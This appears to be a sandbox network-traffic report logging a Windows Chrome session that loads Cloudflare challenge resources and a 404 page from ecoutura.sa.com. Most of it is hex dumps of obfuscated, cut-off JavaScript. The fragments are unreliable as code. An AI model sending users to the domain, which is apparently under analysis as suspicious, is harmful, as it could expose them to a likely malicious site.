                                                                                        2024-11-01 12:46:09 UTC1369INData Raw: 2d 32 5d 2c 44 3d 69 5b 67 57 28 39 38 39 29 5d 28 69 5b 67 57 28 31 32 38 34 29 5d 28 63 45 2c 44 2c 31 37 29 2c 69 5b 67 57 28 31 32 34 32 29 5d 28 63 46 2c 44 2c 31 39 29 29 5e 69 5b 67 57 28 39 33 37 29 5d 28 44 2c 31 30 29 2c 44 3d 69 5b 67 57 28 36 36 31 29 5d 28 63 47 2c 44 2c 63 48 5b 63 49 2d 37 5d 29 2c 45 3d 63 4a 5b 63 4b 2d 31 35 5d 2c 45 3d 69 5b 67 57 28 31 32 38 34 29 5d 28 63 4c 2c 45 2c 37 29 5e 69 5b 67 57 28 31 32 30 39 29 5d 28 63 4d 2c 45 2c 31 38 29 5e 45 3e 3e 3e 33 2e 31 31 2c 63 4e 28 63 4f 28 44 2c 45 29 2c 63 50 5b 69 5b 67 57 28 33 33 34 29 5d 28 63 51 2c 31 36 29 5d 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 73 3d 6f 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 63 66 5b 46 5d 3d 44 3b 63 6f 6e 74 69
                                                                                        Data Ascii: -2],D=i[gW(989)](i[gW(1284)](cE,D,17),i[gW(1242)](cF,D,19))^i[gW(937)](D,10),D=i[gW(661)](cG,D,cH[cI-7]),E=cJ[cK-15],E=i[gW(1284)](cL,E,7)^i[gW(1209)](cM,E,18)^E>>>3.11,cN(cO(D,E),cP[i[gW(334)](cQ,16)]));continue;case'3':s=o;continue;case'4':cf[F]=D;conti
                                                                                        2024-11-01 12:46:09 UTC1369INData Raw: 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 67 59 28 32 34 38 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 59 28 31 37 32 32 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 64 5b 67 59 28 31 35 34 36 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 67 59 28 31 35 38 34 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 67 59 28 39 34 34 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 67 59 28 34 39 35 29 5d 28 4d 29 3b 3b 29 69 66 28 64 5b 67 59 28 31 31 38 34 29 5d 28
                                                                                        Data Ascii: 0,L)?1:0)*F,F<<=1);M=d[gY(248)](e,J);break;case 1:for(J=0,K=Math[gY(1722)](2,16),F=1;F!=K;L=d[gY(1546)](G,H),H>>=1,d[gY(1584)](0,H)&&(H=j,G=o(I++)),J|=(d[gY(944)](0,L)?1:0)*F,F<<=1);M=e(J);break;case 2:return''}for(E=s[3]=M,D[gY(495)](M);;)if(d[gY(1184)](
                                                                                        2024-11-01 12:46:09 UTC1369INData Raw: 6d 27 3a 68 33 28 31 33 31 33 29 2c 27 5a 79 42 43 70 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 61 4d 69 4c 45 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 44 73 51 7a 75 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 68 79 59 63 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 70 45 6c 63 75 27 3a 68 33 28 31 32 31 33 29 2c 27 66 65 62 55 53 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 4c 5a 6d 45 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 2c 6f 5b 68 33 28 31 32 30 32 29 5d
                                                                                        Data Ascii: m':h3(1313),'ZyBCp':function(G,H){return H===G},'aMiLE':function(G,H){return G<H},'DsQzu':function(G,H){return G(H)},'hyYcM':function(G,H){return H===G},'pElcu':h3(1213),'febUS':function(G,H){return G+H},'LZmEZ':function(G,H,I){return G(H,I)}},o[h3(1202)]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.449758104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:09 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:09 UTC240INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:09 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc6b6a2f6be6-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:09 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.449751188.114.97.34435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:09 UTC637OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: ecoutura.sa.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://ecoutura.sa.com/9o93/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: PHPSESSID=b9tlets4pfikfq68tperuik8h3
                                                                                        2024-11-01 12:46:09 UTC838INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 12:46:09 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        cache-control: private, no-cache, max-age=0
                                                                                        pragma: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        CF-Cache-Status: BYPASS
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uYyuOXxMuQ1gvbJJVzRhKKVQMUdjh5eiiYnszarNXl9voZneT9WEzAd3OwoHaoaW%2FCazykFRb72kgT8pIxcvEwGSHHUUpy3W9lquW%2FSonCyXsutrWYTgkqvGdFu52LLCgU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc6e981e359f-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=997&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1215&delivery_rate=2842001&cwnd=243&unsent_bytes=0&cid=d6b0c53177893c26&ts=5659&x=0"
                                                                                        2024-11-01 12:46:09 UTC531INData Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                                                                                        Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                                                                                        2024-11-01 12:46:09 UTC725INData Raw: 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64
                                                                                        Data Ascii: op: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><d
                                                                                        2024-11-01 12:46:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.449759104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:09 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:10 UTC240INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:10 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc70c81f2e51-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:10 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.449760104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:10 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8dbbfc65ff9e6b31&lang=auto HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:10 UTC331INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:10 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 122676
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc723f4c2c85-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:10 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d
                                                                                        Data Ascii: ferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_failure":"Error","turnstile_timeout":"Tim
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 39 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 30 32 35 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 38 38 30 29 29 2f 38 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 31 36 37 29 29 2f 39 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 30 34 31 29 29 2f 31 30 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 31 32 38 30 38 35 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 33 33 33 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 4d 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 67 4d 3d 67 4c 2c 66 3d 7b 27 47 61 50 71 6c 27 3a 66 75 6e 63 74
                                                                                        Data Ascii: 9))/6+parseInt(gK(1025))/7*(parseInt(gK(880))/8)+parseInt(gK(1167))/9*(-parseInt(gK(1041))/10),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,128085),eM=this||self,eN=eM[gL(1333)],eO=function(c,gM,f,g,h,i,j,k){for(gM=gL,f={'GaPql':funct
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 61 46 59 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 61 6c 69 73 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 57 45 48 41 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 66 43 6a 73 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 49 4a 6e 44 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 76 69 76 69 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6b 61 4c 72 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 71 73 73 69 55 27 3a 66 75 6e 63 74 69
                                                                                        Data Ascii: aFYu':function(h,i){return i==h},'aliso':function(h,i){return h(i)},'WEHAp':function(h,i){return h*i},'fCjsu':function(h,i){return h<i},'IJnDB':function(h,i){return h!=i},'vivif':function(h,i){return h(i)},'kaLrV':function(h,i){return h==i},'qssiU':functi
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 31 29 69 66 28 4c 3d 69 5b 67 52 28 31 31 33 31 29 5d 28 4b 29 2c 4f 62 6a 65 63 74 5b 67 52 28 36 36 31 29 5d 5b 67 52 28 39 30 35 29 5d 5b 67 52 28 31 31 39 39 29 5d 28 42 2c 4c 29 7c 7c 28 42 5b 4c 5d 3d 46 2b 2b 2c 43 5b 4c 5d 3d 21 30 29 2c 4d 3d 44 2b 4c 2c 4f 62 6a 65 63 74 5b 67 52 28 36 36 31 29 5d 5b 67 52 28 39 30 35 29 5d 5b 67 52 28 31 31 39 39 29 5d 28 42 2c 4d 29 29 44 3d 4d 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 67 52 28 36 36 31 29 5d 5b 67 52 28 39 30 35 29 5d 5b 67 52 28 31 31 39 39 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 67 52 28 31 34 37 37 29 5d 28 32 35 36 2c 44 5b 67 52 28 37 38 31 29 5d 28 30 29 29 29 7b 69 66 28 64 5b 67 52 28 31 37 32 31 29 5d 3d 3d 3d 67 52 28 31 35 38 30 29 29 7b 66 6f 72 28 78 3d 30 3b 64 5b 67 52
                                                                                        Data Ascii: 1)if(L=i[gR(1131)](K),Object[gR(661)][gR(905)][gR(1199)](B,L)||(B[L]=F++,C[L]=!0),M=D+L,Object[gR(661)][gR(905)][gR(1199)](B,M))D=M;else{if(Object[gR(661)][gR(905)][gR(1199)](C,D)){if(d[gR(1477)](256,D[gR(781)](0))){if(d[gR(1721)]===gR(1580)){for(x=0;d[gR
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 48 5b 67 52 28 31 33 39 38 29 5d 28 64 5b 67 52 28 31 36 34 34 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 52 28 37 38 31 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 67 52 28 31 34 37 37 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 67 52 28 31 30 35 39 29 5d 28 49 2c 31 29 7c 31 26 4e 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 67 52 28 31 33 39 38 29 5d 28 64 5b 67 52 28 31 33 31 35 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 49 3c 3c 31 7c 4e 2c 4a 3d 3d 64 5b 67 52 28 31 31 37 34 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 67 52 28 31 33 39 38 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d
                                                                                        Data Ascii: H[gR(1398)](d[gR(1644)](o,I)),I=0):J++,x++);for(N=D[gR(781)](0),x=0;d[gR(1477)](8,x);I=d[gR(1059)](I,1)|1&N,J==j-1?(J=0,H[gR(1398)](d[gR(1315)](o,I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=I<<1|N,J==d[gR(1174)](j,1)?(J=0,H[gR(1398)](o(I)),I=0):J++,N=
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 56 28 31 33 31 35 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 67 56 28 39 39 35 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 67 56 28 31 33 39 38 29 5d 28 4d 29 3b 3b 29 7b 69 66 28 49 3e 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 56 28 35 36 30 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 64 5b 67 56 28 31 33 35 39 29 5d 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 67 56 28 37 36 38 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 56 28 31 36 34 30 29 5d 28 6f 2c 49
                                                                                        Data Ascii: L=H&G,H>>=1,H==0&&(H=j,G=d[gV(1315)](o,I++)),J|=F*(0<L?1:0),F<<=1);M=d[gV(995)](e,J);break;case 2:return''}for(E=s[3]=M,D[gV(1398)](M);;){if(I>i)return'';for(J=0,K=Math[gV(560)](2,C),F=1;d[gV(1359)](F,K);L=H&G,H>>=1,d[gV(768)](0,H)&&(H=j,G=d[gV(1640)](o,I
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 58 28 31 36 35 39 29 5d 5b 67 58 28 36 30 35 29 5d 2c 27 63 6f 64 65 27 3a 67 58 28 31 35 30 34 29 2c 27 72 63 56 27 3a 65 4d 5b 67 58 28 31 36 35 39 29 5d 5b 67 58 28 31 34 33 33 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4c 28 31 32 33 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 67 59 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 67 59 3d 67 4c 2c 7b 27 4d 43 49 51 53 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65 74 75 72 6e 20 45 28 46 2c 47 29 7d 2c 27 6c 6f 4b 4d 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 7d 2c 27 6d 49 59 42 41 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45
                                                                                        Data Ascii: X(1659)][gX(605)],'code':gX(1504),'rcV':eM[gX(1659)][gX(1433)]},'*'))},g)},eM[gL(1230)]=function(f,g,h,gY,i,j,k,l,m,n,o,s,x,B,C,D){i=(gY=gL,{'MCIQS':function(E,F,G){return E(F,G)},'loKMN':function(E,F){return E instanceof F},'mIYBA':function(E,F){return E
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 6e 20 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 7d 2c 27 57 61 54 79 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 21 3d 3d 6e 7d 2c 27 76 79 6e 42 6b 27 3a 67 5a 28 31 34 38 38 29 2c 27 42 4b 63 79 52 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 7d 2c 65 5b 67 5a 28 37 34 36 29 5d 28 64 2c 45 72 72 6f 72 29 29 7b 69 66 28 65 5b 67 5a 28 36 33 37 29 5d 28 65 5b 67 5a 28 36 31 36 29 5d 2c 67 5a 28 31 34 38 38 29 29 29 7b 66 6f 72 28 6f 3d 67 5a 28 34 33 34 29 5b 67 5a 28 31 31 35 33 29 5d 28 27 7c 27 29 2c 73 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6f 5b 73 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 42 3d 6a 5b 67 5a 28 33 35 31 29 5d 28 65 5b 67 5a 28 31 32 32 32 29 5d
